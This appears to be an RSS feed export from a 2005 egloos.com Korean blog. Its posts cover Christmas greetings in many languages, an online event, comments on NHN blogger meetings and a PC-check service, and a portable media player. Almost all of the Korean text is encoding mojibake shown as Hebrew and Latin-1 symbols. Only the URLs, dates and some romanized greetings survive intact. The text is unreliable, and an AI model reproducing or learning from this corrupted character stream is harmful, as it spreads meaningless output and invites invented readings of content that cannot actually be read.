    -½÷ֵה¸®µµ ¾א°£ְ÷ ÷ף¾אַֿ¿© ְֳ¼ְְ¸·־ '÷¼°ֵ¸®' ´ֲ ֱ¦°רֱַצ¸¸ '»‎°¢ַׂ °ֵ¸®' ´ֲ ֱ¦°רֱַֿצ ¸רַ´´ֲ ´ְ³¦ְּ µל´ֿ´. ¿µָ­¸¦ ÷¸°ם ³­ ִָ¿¡ ´ְ²¸ֱר °ְֽ÷, '¿µָ­¸¦ ֱ» ±ַֿ°װ ¸¸µי¾ת³×?' ַֿ´ֲ »‎°¢ ְּ¾ת½ְ´ֿ´. ¹÷°¡ ֱ»´ץ ֱ¦´כ·־ ¸¸µי¾ת´¸י ֱ₪¸» ְֱֱ÷ ¿µָ­°¡ µֹ ¼צ ְײ¾תְ» ֵµ¥ ½÷ְְִֹֿ÷ »ף´חָק ְו´כַֿ°װ ְג¾ְׂ¸³× ½ֳ°£ְ ֱ¦¾אְ¸·־ ±׳·± ְו´כַׁ ½÷ֵה¸®¿¡ ֶקְ־ֶ®¸¦ ֱײֱצ ¸רַֿ°ם ¹װ¹װַֿ°װ ְּ²ר¾מ°¡´ֲ µםַׁ ´ְ³¦ְּ °­ַ½ְ´ֿ´.
    -
    -¶ַַׁ, ±₪°ם¸¦ ³¹« ¸¹ְּ ַֿ°ם ±₪°ם¿¡ »נְװµָ ְו¸יְּ ³¹«µµ ¸ֱ®¼­ ±ג´כ°¨ְּ ³¹« ִַ´ר ¿µָ­°¡ ¾ֶ´ׁ°¡ ½ֽ½ְ´ֿ´. ¸¸¾א ±₪°ם¹°µמְ» ַֿ³×µµ ֱ¢ֱַֿצ ¾ְ÷ »ףֲֵ¿¡¼­ ְְ‎ַׁ ¼צֱ״ְַ ±ג´כ°¨¸¸ °®°ם ÷ֳ´¸י 'ֱ₪¸» ´כ´ַׁ ¿µָ­' ¶ף°ם ַׂ¸¸ ַױ´ֿ´.
    -ַׁ¸¶µנ·־ ֱ₪¸®ַֿ¸י '±ג´כַׁ ¸¸ֵ­ְ÷ ¾ֶ´ֱֿצ¸¸ ¾מֲ·µח ְֱֱ÷ ¿µָ­' ֱ₪µµ µַ°³׳¿ה.
    -
    -ְת´ֲ »ף´חָק ¸¸ֱ·½÷·´°װ ÷ֳ½ְ´ֿ´. ¿ְ·£¸¸¿¡ ֱ¢ַֿ´ֲ ½÷ֵ©¸°¿¡¼­ְַ ְוµ¿°ַ¾¾ְַ ִ«¸®½÷¸¶..
    -ֱ₪¸» ´כ´ ַ½ְ´ֿ´. ±׳°ֵ ַֿ³×¸¸ְ¸·־µµ ְ‎´כ·־ ֵץְַׁ ÷ס¿כְּ ¾ֶ±ץֱצ´ֲ ¾ְ÷ ¿µָ­ ְװ´ֿ´. - ]]> -
    - ¢ֶ ¹®ָ­ְ »ח°ם ¢ֶ - Sun, 25 Dec 2005 18:23:47 GMT -
    - - <![CDATA[ ¿©·¯÷׀ ! Merry Christmas ~! ]]> - http://xenix.egloos.com/1215077 - -
    ¿µ¾מ·־´ֲ ¸¸® ֵ©¸®½÷¸¶½÷(Merry Christmas)
    -÷ך¶ףֱת ¸»·־´ֲ ÷¸¾ֶ½÷ ֶה½÷ֵ¸½÷(Boas Festas)
    -ַכ°¡¸®¾מ·־´ֲ ÷¼·ֿ ִ«¶פ¼ׂ´ֿ(Boldog Karacsony)
    -ְֵּ»¸®¾ֶ¾מ·־´ֲ ÷־¿ֻ ³×ֵ»¸®(Buon Batale)
    -¸½ֳִ¾מ·־´ֲ ֶח¸®ֳק ³×÷ס´כµו(Feliz Navidad)
    -µ¶ְֿ¾מ·־´ֲ ֱַ·¸®ָק ÷£ְ־¾ֵֶ©ֵ(Frohliche Weinachten)
    -½÷¿‏µ§¾מ·־´ֲ ±·¡µו ְ²(Glad Yul)
    -ֱַ¶½÷¾מ·־´ֲ ֱ¶ְְּ¯ ³כ¿₪(Joyeux Noel)
    -ָס¶ר¾מ·־´ֲ ִ®¶ף ֵ©¸®½÷ֵה°װ³×(Kala Christougena)
    -·¯½ֳ¾ֶ¾מ·־´ֲ ½÷·־ֳ¼½÷ֵה÷½ ֵ©¸®½÷ֵה÷צ(Srozhestvom Khristovym)
    -ֱ±¹¾מ·־´ֲ ¼ֽµ‎ִגְּ·¯(ב¡ק«צבױ¥)
    -
    -ַׁ±¹¸»·־´ֲ ֱס°ֵ¿מ ¼÷ֵ÷ְ‎ ÷¸³»¼¼¿ה ₪»₪»₪»

    -¾נ¾מ´ֲ ´¶ףµµ ֳא÷¹ַֿ´ֲ ¸¶ְ½ ַֿ³×´ֲ °°ְ÷ ¼¼°טְ־ְַ ֳאֱ¦ ֵ©¸®½÷¸¶½÷ ְװ´ֿ´.
    -µµםַֿ°ם, ¶ז±םְ÷ ֵ©¸®½÷¸¶½÷ ÷¸³»½ֳ±ג ¹¶ר´ֿ´.
    -
    -¿©·¯÷׀.. ¸¸® ֵ©¸®½÷¸¶½÷ !@#$@#$%$
    -
    -ֱ¦ ´׀ ½÷.~


    ¾מµנ¼­ ¸¹ְּ ÷¸´ר ֶק½÷ֶ®ֱׂ ? ְ³ג ֵ©¸®½÷¸¶½÷¿¡ ½ט´ר°ֵ ִ«ַַַ״¼­ ÷¿´½ְ´ֿ´.-_-;
    -¿ר·¡, ¾מֱ¦ »ץ÷®¿¡ ¾²·ֱ°ם ַ´ר ֶק½÷ֶ®ְ־µ¥.. ¼ת°ת ַװ²² ַֿ´°¡ ֱ₪½ֵ ֲק·ֱ ÷¸´ֿ ֱצ±ְּ±÷¿ה -_-;;
    -ֱ₪¸» ¼׃¾²¸° ֵ©¸®½÷¸¶½÷ ְװ´ֿ´. ¿ר·¡ °טָ¹ְ÷ 23ְֿ³¯ ¼ת¸װ±ג ½ְֳַ״¼­ 24ְֲֿכ ¾²·¯ֱ®¼­..
    -26ְֿ³¯ ±ת´ֲ°װ ¸סַ¥ ¿´´ֲµ¥ ְּ·¸°װ ְֲֿן ±ת¹צ¸®¸י °ן¶ץֱַֿצ ¸»ְװ´ֿ´.
    -
    -±׳·¡¼­, ְת´ֲ ´½ֳ ¼ת¸װְ¸·¯ ³×°¡÷ֱ¾ ַׂµם ַױ´ֿ´.
    -
    -¿©·¯÷׀, ¾ף¸¶ ³²ֱצ¾ְ÷ ¼÷ֵ÷ְ‎ ¹ִּ£µםְּ ֱס°ּ°װ ÷¸³»½ֳ±ג ¹¶ר´ֿ´. ¾מֲ·µח ¸¸® ֵ©¸®½÷¸¶½÷ ~! - ]]> -
    - ¢ֶ ם»ח°ם ¢ֶ - Sun, 25 Dec 2005 06:43:14 GMT -
    - - <![CDATA[ ְתµµ '½¬¸²ֱַ ´©µו ְַַ' ´חֳ· !! ]]> - http://xenix.egloos.com/1213811 - -
    [ °רֲ¥·־ ְַַ¸װ´ֲ¹‎ ] - likejazz´װ ÷ם·־±׳
    -
    -´ְ½ ִ«ֶה ֱַ·»ֱמ ¿ְֲַ ְּ÷¥ֶ®·־ ֱרַאְֱ־ ¹ּ½÷ֵֽ ְַַ ½¬¸²ֱַ ´©µוְַַ¿¡ ´חֳ· µֶ½ְ´ֿ´.
    -
    -ֶעְֿ¿¡ ¿ְְ 11½ֳ¿¡ ַׁ¹ר, ¿ְִָ 4½ֳ¿¡ ַׁ¹ר ֱרַאµַ´ֲµ¥ ¸ױְת 3¸םְַ Daum ID °¡ ַ¿הַױ´ֿ´.
    -ְּ÷¥ֶ® ֶהְֱּצ¿¡ °¡¼­, ַׁ¸םְּ ִ«ֶה ֱַ·»ֱמ¸¦ °³¼³ ַֿ°ם ³×¸׃ֱצ µ־¸םְּ °¡ְװְ» ַֿ°ם ´כ±גַֿ°ם ְײ´°¡.. ְּ÷¥ֶ® ½ֳ°£ְ־ ¿ְְ 11½ֳ³× ¿ְִָ 4½ֳ ֱ₪°¢ְּ µַ¸י °¡ְװַׁ ִ«ֶה ֱַ·»ֱמ »ף´¿¡ °רֲ¥ ְַַ ½ֳֵ» ¹צֶ°ְ» ¼ֲ´ ְל½־°װ ´­·¯ ֱ´ֿ´.
    -
    -´חֳ· ְֱֶ÷, ¹ּ¸® °¡ְװַ״ ³ץ°ם ִ«ֶה ֶהְֱּצ¸¦ ¶ח¿צ ³ץְ÷ »ףֲֵ¿¡¼­ ֱ₪°¢ְּ µַ¸י ´­·¯¾ ַֿ¸ח ִִַ»ֵֽ°¡ 2´כ ְַּֿ ְײְ» °ז¿ל¿£ ַׁ´כ¿¡¼­ ·־±׳¾ֶ¿פ, ·־±׳ְ־ְ» ַׂ °ז¿ל ִ³½¬³× ¼¼¼ַ ¹®ֱ¦·־ ְּ÷¥ֶ® ½ֳ°£ְּ ³¡³µ´´ֲ ¸¼¼ֱצ°¡ ֳג·ֲ µֹ ¼צµµ ְײְ¸³× ¾א 1~2÷׀ְ÷ ´ץ ´©¸£´ ÷¸´ֿ ´חֳ· µַ´ץ±÷¿ה.
    -
    -ֶע¼ׂ¿¡ ְ ½ֳִׁ¸װ±ג ָµח ¹«·ֱ 29,900¿ר ֲ¥¸® ְְַַּ´ֿ ¿ש¿הְֿ³¯ ²ְ ְןֳכ ַֿ½ֳ±ג ¹¶ר´ֿ´.₪» - ]]> -
    - ¢ֶ ם»ח°ם ¢ֶ - Fri, 23 Dec 2005 08:49:49 GMT -
    - - <![CDATA[ ÷ם·־±׳¿ֽ ¸¶ֳִֶֹ. ±׳¸®°ם, ÷ם·־°ֵ °£´דָ¸. ]]> - http://xenix.egloos.com/1213036 - - ¡°÷ם·־°ֵ °£´דָ¸¡±¿ֽ ¡°÷ם·־°ֵ ÷¸µµְ·ב¡± ] - hof ´װ ÷ם·־±׳
    -[ ±׳ ¾ֻ·®ַׁ ÷ם·־±׳ ְת³־¸®ֱע ] - ÷ם·ח¹®´װ ÷ם·־±׳
    -[ ÷ם·־±׳¿ֽ ¸¶ֳִֶֿ ] - likejazz ´װ ÷ם·־±׳
    -
    -ְת´ֲ, hof ´װְַ ÷ם·־±׳¸¦ ±¸µ¶ ַֿ°ם ְײ¾מ¼­ ְּ ±ְ» ְֲֿן ֱ¢ַ½ְ´ֿ´¸¸, ¶ַַׁ ֱ¦°¡ ֵ¸°ְּ µַ°ם ְײ´´ֲ ´ְ³¦µµ ¹ְ÷ °ֽµµ »ח½ַ ְװ´ֿ´¸¸,
    -
    [¾קµ¥ְֶּ®]#1@12/22 13:25
    -ֶ¯ֱ₪ְ־ְַ ֶק½÷ֶ®¸¦ ÷¸°ם ½ט´ֱֲצ ְ² ¾ך±ג°¡ ³×¿ְ´ֲµ¥ °דִ¡´ֲ ¡°±׳ ÷׀¡±ְַ ÷ם·־±׳¸¦ ±¸µ¶ֱַֿצ ¾´ֲ´. °£´דָ¸ °¬´¿ֽ¼­ ±ְ» ½ט´´ֲ °ֽµµ ¾מֱ¦ ¹ד ´°װ ³»±ְ» ÷» ´©±÷°¡°¡ ¸µֵ©¸¦ ֱא¼­ ±׳¶§¼­¾ ֳ³ְ½ ÷» °ְּֽ°ם.

    -ָ£ֱַ´װ²²¼­ ְּ·¸°װ (¹°·׀ ְּ ³»¿כְּ ְת¸¦ ֱצִ×ַֿ´ֲ°װ ¾ֶ´ׂ °¡´ֹ¼÷µµ ֵ©ֱצ¸¸..;;) °°ט°¡ ¾רְ½ְ» ¹אַפ ֱײ½ֳ°ם ³­ ¸¶´ח¿¡ ֱ¦°¡ ֱ¦ ְװְוְ» ¹אָת ±ְ» ְ¾מ¾ ַֿ³× °ם¹־µµ ַ״ ÷ֱֳצ¸¸, ±׳·¡µµ ְִ© ֱ¦ ±ְּ ְּ·± ³םְןְ¸·־ ְ־ַ״ ֱ¦°¡ ְַµµֱַֿצ ¾ְ÷ ¹זַגְ¸·־ °מַ״µֹ °¡´ֹ¼÷ְּ ְײ¾מ °·ֳ ְװְוְ» ֱ₪¸®ַ״ µ־±ג·־ ַױ´ֿ´.

    ¾ֶ½ֳ´ ½ְּֽ ¸מְְֿ, nhn ¿¡¼­ ֱײֳײַׁ ÷ם·־°ֵ °£´דָ¸¿¡ ֲ¼®ַ°ם, ±׳ µ¿¡ '³׳ְּ¹צ ³»PC °ֻ»צ ¼­÷ס½÷ ¸®÷ה' ¶ף´ֲ ¾מ¶»°װ ÷¸¸י »ף´חָק ³׳ְּ¹צ ְװְו¿¡ ֶםַגְְֿ ¼צµµ ְײ´ֲ, ±₪°ם¼÷ ±·־µµ ÷¸ְֿ ¼צ ְײ´ֲ ±ְ» ְ¾ת½ְ´ֿ´.
    -
    -¿©±ג¼­ »‎±ז ¼צ ְײ´ֲ ¿ְַ״´ֲ, hof ´װְַ ±¿¡¼­ ¸»¾¸ַֿ½ֳ´ֲ °ֳֽ³·³
    -
    ֱ₪¼÷½÷·¯¿מ(?) ֳ´כ¸ְְֿ» ¹°ם »±מ»·ֲ½ַׁ ֱַ¸®ֱ¨ֵ׳ְּ¼ְַ» ÷¸°ם 1ְ־´ח ¸מ¸¸¿רֲ¥¸® ֱָ­¿ה¸®³× ֳגְו÷־ֶה ´כֱ¢ְ» ¹ְ¸¸ח ְֿ¹ְ־(¾צ¹׀ַֿ°װ ¸»ַ״ ´ח½ְֵַ ÷ם·־±׳¸¦ ¹ז¹®ַֿ´ֲ ¹ז¹®ְ ¶ַ´ֲ µ¶ְ)ְ÷ ½±°װ ±¸ַׂ ¼צ ¾ר´ֲ ְּ¸¥¹ ·¹¾מ¾ְֵֶּ°°ְ÷ ±׳µיְַ ·־°ם°¡ ֲןָש ±ג³הַ°ְ» ¹¾ֶµח °ְּֽ, ְ½ְֵּ ÷ם·־±׳¿¡ ¾²´ֲ ³»¿כ¿¡ ¾ֶ¹«·± ¿µַגְ» ³¢ִ¡ֱצ ¾¾ׂ°ם ֱ₪ֱ₪´ח´חַֿ°װ ְ½ְֵַ ¾ח½ֹ°ת ְּ¼÷¿¡ µ¶ף ±ְ» ¾´ °ְּֽ¶ף ְו´דַׂ ¼צ ְײ³×. ±׳ ְ־ֱצµµ¸¦ °¡ֱצ°ם ±׳ ָחִ¡ ¾ְ÷ ְ¸®¿¡ °¡¼­ ÷¸°ם µט°ם ¸»ַֿ°ם ¿ֽ¼­ ¾²´ֲ°װ °םְ ±׳·± ¡°דז¿כ÷ס¾מֳµ°¡¡±¶ף¸י ±₪°ם½ַ¾מֱײ¸י ±ג»ח½בֱ״´´ֲ °ֵ·¡¸¦ ַֿ°ֵ³× PRֶהְֱּצ¶ף°ם ²ְ´כ±ג ±¸¼®¿¡ ֱדֱ¿¸¸ַֿ°װ ¸ֵ´°ם ¸¶ִ¡ ±ג»ח°°¾ֶ÷¸ְּ´ֲ ±₪°ם¸יְ» °®°ם ְײ´ֲ ½ֵ¹®°ת ´¸¦°װ ¹«¾מ¶ץ ¸»ְ־°¡.

    -ְּ·± ÷־÷׀¿¡ °ַׁ ¿ְַ״ְֿ °ְֽװ´ֿ´. ֱַֿצ¸¸, ´¼ר ¸ם·בַֿ°װ ¸»¾¸ µו¸®¸י ³׳ְּ¹צ ֳר¿¡¼­ ÷׀¸ם ֱ₪¼÷½÷·´°װ ֳ´כַ״ ֱײ½ֳ°ם ¸¹ְ÷ ֱ״÷ס¸¦ ַֿ½ֵ°ְֽ÷ »ח½ַ ְֱּצ¸¸ ±׳¸® °¨µ¿¹ְ» ¸¸ֵ­ »±מ»·ֲ½ַׁ ¼צֱ״ְ÷ ¾ֶ´ֿ¾ת½ְ´ֿ´.
    -
    -ְת´ֲ ְּ¹ר ³׳ְּ¹צ °£´דָ¸ ¿¿¡µµ FGI, ְ־ֵֽ÷ה µמְַ ¸ם¸סְ¸·־ ¸¹ְ÷ ¾קֳ¼µיְַ ÷ס½ֱַׁ ַא»ח¿¡ ֲ¿©ַֿ°ם ְײְ¸¸ח ְּ ¾קֳ¼µי ֱ¿¡´ֲ °°ְ÷ ֶקֵ׀ ¾ק°טְַ ¾קֳ¼µיְ־ ´ְ½µµ ְײ°ם, ¿¥ִֶ½÷µµ ְײ½ְ´ֿ´. ±׳¸®°ם ָ£ֱַ´װ²²¼­ ± ÷»¹®¿¡ ³²°ֱײ½ֵ °ֳֽ³·³ ¿¥ִֶ½÷ְַ '¾ָ³חַֿ¼¼¿ה, ֱ¦´׀½÷´װ. ³׳ְּ¹צ °£´דָ¸´ֲ ְ ´³א ¿ְ¼ּ½ְ´ֿ±מ?' ·־ ½ְֳַֿ´ֲ ¸ְֿµµ ¹¾ׂ½ְ´ֿ´.
    -
    -±װ¸נ´ֲ ³׳ְּ¹צְֲּ ֱ» ִ¿ ÷¸¿´ֱצ¸¸, ´ְ½, ¿¥ִֶ½÷ µמְ÷ ְ־ֵֽ÷ה÷ס, FGI ֲ°¡÷ס µמְַ ¸ם¸סְ¸·־ 'ַצ±' ְ» ֱצ±ַֿ°ם ְײ´ֲ °ֽ¿¡ ÷סַֿ¸י ְ־ֳµ¿¡¼­ ÷׀´ח ְּ¶ף´ֲ ¸ױ °ֵ¸®¸¦ ֱ¦ ÷ס¿כ°ת ½ֳ°£ְ» ֵץְַ״ ֲ¼®ַׁ 'µ·µµ ¾ָµַ´ֲ' ±׳·± °£´דָ¸°¡ °£´דָ¸ ְֳ¼·־¼­ ֱ¦°¡ °¨µ¿¹¾ֶ¼­ ±׳ ָ¸»ח¸¦ ֲש¾חַׂ ¸¸ֵ­ '°תַֿ°װ »±מ»·ֲ½ַׁ' ְ¸®´ֲ ¾ֶ´ֿ¾ת´°ם »‎°¢ ַױ´ֿ´.
    -
    -³׳ְּ¹צ °£´דָ¸ ½ְֳ½ֳ¿¡, °£´ַֿ°װ ֲ¼®ְµיְּ ְ±ג ¼ׂ°³¸¦ ַֿ´ֲ ½ֳ°£ְּ ְײ¾ת½ְ´ֿ´. ְּ¶§, ְ±ג ¼ׂ°³ ִָ¿¡ ³׳ְּ¹צ ¼­÷ס½÷¿¡ ´כַׁ °£´ַׁ ִ¸אֶ®¸¦ ַֿ´ֲ ½ְִ¸·־ ְ±ג ¼ׂ°³°¡ ְּ¾מֱ³´ֲµ¥, ְת´ֲ ְּ¶§ "¾ָ³חַֿ¼¼¿ה, ֱ¦´׀½÷ְַ »ח°ם¹¶ִ¡¶ף´ֲ ÷ם·־±׳¸¦ ¿מ¿µַֿ°ם ְײ´ֲ ֱ¦´׀½÷¶ף°ם ַױ´ֿ´. ³׳ְּ¹צ °°ְ÷ °ז¿ל´ֲ ֱצ½ְִ־ ¼­÷ס½÷¸¦ ְח¹ְּײ´ֲ ±µיְּ ¸¹¾ֶ ¿פ±ג ְ§ַ״ °¡² »ח¿כַֿ´ֲ ¿¿¡´ֲ ±׳¸® ְ »ח¿כַֿ´ֲ ֶםְּ ¾ֶ´ׁµ¥ ÷ׂ·¯ֱײ¼ֵ¼­ ְַ¿ ¿´½ְ´ֿ´.' ְּ·¸°װ ְ־»ח¸¦ ַ½ְ´ֿ´.
    -
    -±׳¸¸ֵ­ ±׳ ְ¿¡´ֲ ³׳ְּ¹צ°¡ 1ְ§ ±ג¾קְּ¶ף´ֲ µ¥¿¡¼­ ¿ְ´ֲ ¾מ´ְֱ₪µµְַ °ֵ÷־°¨°ת ¼±ְװ°ְ» °®°ם ֱ» ¾ְֱֱָ÷ ְּ¹ֱּצ·־ »‎°¢ַֿ°ם ְײ¾תְ¸´ֿ±מ¿ה. ±׳·¸´ ÷¸´ֿ, ֱצ½ְֵ־ ¶§¹®¿¡ °ֻ»צ¿£ֱר ְ¸·־¼­ְַ ³׳ְּ¹צ´ֲ ְֱײ »ח¿כֱַצ¸¸ ±׳¿ ¼¼÷־ְְ־ ¼­÷ס½÷¿¡ °ַ״¼­´ֲ »ח¿כַ״ ÷» ְְּ ¾ר¾ת½ְ´ֿ´. (»ח½ַ ³» PC°ֻ»צ ¼­÷ס½÷ ¶ף´ֲ°װ ÷£ֵ¸¸¦ ½ְֳ ַ´ֱֲצµµ ¸נ¸£°ם ְײ¾ת½ְ´ֿ´.)
    -
    -±׳·¯´ר ¿ֱֽ¿¡ ¾מֲ·µח ±׳·± ְ¸®¿¡ ֳ´כ¹¾ֶ ¾ֹ¾ֶ¼­ ֳ³ְ½ְ¸·־ ¼¼÷־ְְ־ ¼­÷ס½÷µי¿¡ °ַ״ ְ¼¼ָק ¾ֻ ¼צ ְײ´ֲ ±גָ¸°¡ µַ¾ת°ם, °ֵ±ג¼­ »לֶל÷» ´¸¥ ¼­÷ס½÷µיµµ ְײֱצ¸¸ '³» PC°ֻ»צ' ¼­÷ס½÷°¡ ֱ¦ ¸¶ְ½¿¡ µי¾תְ» »׃ְװ´ֿ´. ¶ַַׁ ְת´ֲ, ְּ¹ּ ¹אָש¹ ְײֱצ¸¸ ¸¹ְ÷ ÷ם·־°ֵ ¿©·¯÷׀µי ֳ³·³ 'ְֽ½÷¸¦ ½ָ¾מַֿ°ם ְִֶּ¾מֶר½÷¸¦ »ח¿כַֿ´ֲ' »ח¶קµµ ¾ֶ´ֿ°ם '³׳ְּ¹צ¸¦ ½ָ¾מַֿ°ם ±¸± ִ£ָ­ְְ־' »ח¶קµµ ¾ֶ´ױ´ֿ´.
    -
    -¾מֲמ µֶµח, nhn ֳר¿¡¼­ ְת¸¦ ÷ׂ·¯ֱײ½ֵ ְְּ¯¸¦ ְת´ֲ '³׳ְּ¹צ¿¡ °ַ״ ְֱֱ÷ ±ְ» ½ב´¶ף' °¡ ¾ֶ´ֿ¶ף '³׳ְּ¹צְַ ¼­÷ס½÷¸¦ ֶם°¾רְּ ÷ֱ´¶ף' ·־ ְַּ״ַ°ם, ֳײ´כַׁ ֶם° ¾ר´ֲ ½ֳ¼±¿¡¼­ ¿©·¯°¡ֱצ ¼­÷ס½÷¸¦ ֱ¢ַ״÷¸´ֿ 2003³ג 12¿ש÷־ֵֽ ½ב¿ְ´ר '³׳ְּ¹צ ֵר¹' ¿¡ °ַׁ ¾קµ¥ְֶּ®°¡ ´«¿¡ ¶ח¾ת°ם, °ֵ±ג¿¡ ֶקַװµָ '³» PC°ֻ»צ' ¼­÷ס½÷°¡ ¸¶ְ½¿¡ µי¾מ¼­ ¼ׂ°³ַֿ°װ µְֶ» »׃ְּ¶ף´ֲ °ּ´ֿ´.
    -
    -¾ֶ½ֳ´ ½ְּֽ ְת´ֲ, °¢ֱ¾ ֱ¦ַ° ¸®÷הµµ ַֿ°ם ְײ°ם, °¢ֱ¾ ¼­÷ס½÷¿¡ °ַׁ ֱ¦ »‎°¢µיְ» ְ±גµµ ַױ´ֿ´. ±׳·²¶§, ´ח¿¬ָק ְתµµ »ח¶קְּ´ֿ ֱ¦ ¸¶ְ½¿¡ µו´ֲ ֱ¦ַ°ְ÷ ְֱֱ÷ ³»¿כְ¸·־ ְ¾מ ֱצ°ם, ¸¶ְ½¿¡ µיֱצ ¾´ֲ ֱ¦ַ°ְ÷ ֱ» ³×» ¹זַגְ¸·־ ְ¾מ ֱצ°ם ±׳·¸½ְ´ֿ´. ¹¹, 'ְּ·±' ±ְ» ְ°װ µַ´ֲ°ֽ ¿×½ֳ ֱ¦°¡ ֱײֵ©¿ֲ¿¡¼­ µ·ְ» ¹¾ֶ¼­ ְּ·±°ֹ ְ¾מֱײ´ֲ°װ ¾ֶ´ֿ°ם, ±׳³ֹ ֱ¦ ¸¶ְ½¿¡ µו´ֲ ¼­÷ס½÷ְּ±ג ¶§¹®¿¡ ְּ·±±ְ» ְ´ֲ°ֽ ְװ´ֿ´.
    -
    -÷ם·־±׳ ¶ף´ֲ °ְּֽ ֲ ±׳·¸½ְ´ֿ´. ÷ם·־±׳ ְֳ¼°¡ ְת°°ְ÷ ÷ם·־°ֵµי ¿¡°װ ¹«¾נ°¡ ¸¹ְ÷ ±גָ¸¸¦ ֱ¦°רַ״ ֱײ´ֲ°ֽµµ »ח½ַ ְֱּצ¸¸ ±׳·¸´ ÷¸´ֿ ¾מ´ְֱ₪µµ ֱײ¸סַֿ´ֲ »ח¶קµיְּ »‎±ג°ם, ±׳ ֱײ¸סַֿ´ֲ »ח¶קµיְ» ְּ¿כַֿ·ֱ´ֲ »ח¶קµיµµ »‎±ג´ֲ°ֽ °°½ְ´ֿ´.
    -
    -±׳·¯¸י ¿ל¸®´ֲ ±׳ ֱײ¸סַֿ´ֲ »ח¶קµיְ» ְּ¿כַֿ·ֱ´ֲ »ח¶קµיְ» ¹«ֱ¶°ַ ¹טֱ¦ַ״¾¸¸ ַֿ´ֲ°ַ°¡¿ה. ±׳·¸ֱצ ¾´°ם »‎°¢ ַױ´ֿ´. ÷׀¸ם ±׳»ח¶קµיְּ ָ«÷¸ַֿ°םְ ַֿ´ֲ ³»¿כ ֱ¿¡´ֲ ¿ל¸®µי¿¡°װ ֱקֱ¢ְְ¸·־ µµ¿עְּ µַ´ֲ, ±׳ ¼­÷ס½÷ְַ ¼ׂ°³ ְֳ¼°¡ ַֿ³×ְַ ֱ₪÷¸°¡ µַ´ֲ °ז¿ל°¡ »ף´חָק ¸¹ְּ ְײְ¸´ֿ±מ¿ה.
    -
    -¿¹¸¦µי¾מ ְ½·ב¼צ ¾ך±ג¸¦ ַׂ¶§ ³»°¡ ¿ְ´ֳ ִִ«ִ¶ף¸¦ ¸¶¼ְּ¸¸י ִִ«ִ¶ף¸¦ ¸¶¼ּ´°ם ¾²´ֲ°ֱֵצ ֶ¯ֱ₪ »ףַ° ±₪°ם°¡ µָ´´ֲ ְְּ¯·־ ³» ÷ם·־±׳¿¡¼­ ±מֱצ ¡¡ִ¶ף ·־ ַ¥±גַׂ ַ¿ה´ֲ ¾ר´´ֲ °ּ´ֿ´. ֱצ± ±מֱצ ±׳·¡¿װ°ם, ¾ױְ¸·־µµ ±׳·² °ּ´ֿ´¸¸ ֱ‎¿¡¼­ ¼­ַ־ַֿ´ ÷» ¼­÷ס½÷µח, °½ְִ» ֲק·ֱ ÷ׂ·ֱ°¡¼­ ´ס°¡¸¦ ¹°ם ֱ¢ַׁ ¼­÷ס½÷µח ±׳°װ ְֱֱ÷°ֵ¸י ֱֱ´°ם, ½ְָ÷°ֵ¸י ½ָ´°ם ±׳ ¾קֳ¼¿¡ ±₪°ם°¡ µַµח ַַַ״°¡ °¡µח ַֿ°ם½ְֽ÷ ¸»ְ÷ ´ ַֿ¸י¼­ ÷ם·־±כ ַׂ°ּ´ֿ´.
    -
    -¿ל¸®°¡ ֱ¸³ְ» ֱצִׁ¾ ַֿ´ֲ ¾נ·׀ ¸ֳֵ¼µµ ¾ֶ´ֿ°ם(¾נ·׀ ¸ֳֵ¼µµ ֱ¸³ ¸רֱצֵ°ֱצ¸¸..), ְֱֱ÷°ַ ֱֱ´, ½ְָ÷°ַ ½ָ´°ם ַ¥ַצַֿ´ֲ ְֲּ ְֿ÷־·¯ ִִ«ִ¶ף¸¦ ¡¡ִ¶ף·־ ַ¥±גַֿ´ֲ °ֽ ÷¸´´ֲ ÷ם·־°ֵ°¡ ַ״¾ַׂ ְֿ¿¡ ´ץ °¡±ץ´°ם »‎°¢ ַֿ±גµµ ַֿ°ם ¸»ְװ´ֿ´. - ]]> -
    - ¢ֶ ם»ח°ם ¢ֶ - Thu, 22 Dec 2005 11:03:47 GMT -
    - - <![CDATA[ ¾ְֶּ¸®¹צ, Dicple ¥ב ֳג½ֳ ¿¹ֱ₪ ]]> - http://xenix.egloos.com/1212955 - - ¾ְֶּ¸®¹צ, Dícple ¥ב ֳג½ֳ °רֱצ ] °ר½ִ ָ¨ֶהְֱּצ
    -
    -¾ְֶּ¸®¹צ µסְֳַַ »ץ¹צֱ¯ְּ ֳג½ֳµָ´°ם ַױ´ֿ´.
    -±גֱ¸ µסְֳַַ °ז¿ל, »חְ °ֻ»צְ» ַֿ¸י¼­ MP3 ְִֶֿ ְח»‎ְּ ÷ׂ°¡´ַֹ״¼­ ¸»ְּ ¸¹¾ׂ¾ת´ֲµ¥, ְּ¹ר¿¡´ֲ »חְ°ֻ»צ°ת µ¿½ֳ¿¡ MP3 Play °¡ ֱצ¿ר µָ´°ם ַֿ³׳¿ה.
    -
    -4.3ְ־ִ¡ ¿ְּֽµו ֳִ·¯ LCD ֳ₪¿כ¿¡, ְּ¹ֱּצ ÷¸±ג°¡ °¡´ַֹֿ°ם, FM ¶ףµנ¿ְ, ÷¸ְּ½÷ ·¹ִµש, ±׳¿¿¡ ַׁ± ¹ְ½ְ¸·־ ´¾מ ֳ£±גµמ »חְְ¸·־¼­ְַ ´¾חַׁ ±ג´ְֹ» ֱ¦°רַױ´ֿ´.
    -±גֱ¸ µסֳַ¿¡ ÷סַ״¼­´ֲ ָ®½ַָק ¿ֿ¼÷µµ°¡ ³פ¾ֱֶר°ֽ °°³׳¿ה.
    -
    -±׳·±µ¥, 4.3ְ־ִ¡ ¿ְּֽµו ½÷ֵ©¸° ְוֲר¿¡ ½÷ֵ©¸°ְּ ְ¾ֶ÷¸ְֿ ֱ₪µµ·־ »חְֱּמ°¡ ²ֿ ִ¿ֱ³±¸¿ה »חְְ־µ¥µµ ִֵֽ¡½÷ֵ©¸°ְ» ֱצ¿רֱַֿצ ¾´ֱֲ¡, 4.3ְ־ִ¡ ¿ְּֽµו ֳִ·¯ LCD ְוֲרְ־µ¥ µ¿¿µ»ף ֳַ·¹ְּ°¡ ÷ׂ°¡´ֹ ַֿ´´ֲ ֱ¡µמְ÷ ´ֱ¡ְ¸·־ ÷¸ְװ´ֿ´.
    -
    -¾ֶ, ±׳¸®°ם ¶ַַֿ³×ְַ ְוֱ¡ְ÷... ¸נµ¨ ±טֲֵָס¾¾°¡ ¿¹»´´ֲ °ּ´ֿ´...₪·_₪· - ]]> -
    - ¢ֶ ¾ף¸®¾מ´נְֵֽ»ח°ם ¢ֶ - Thu, 22 Dec 2005 08:41:07 GMT -
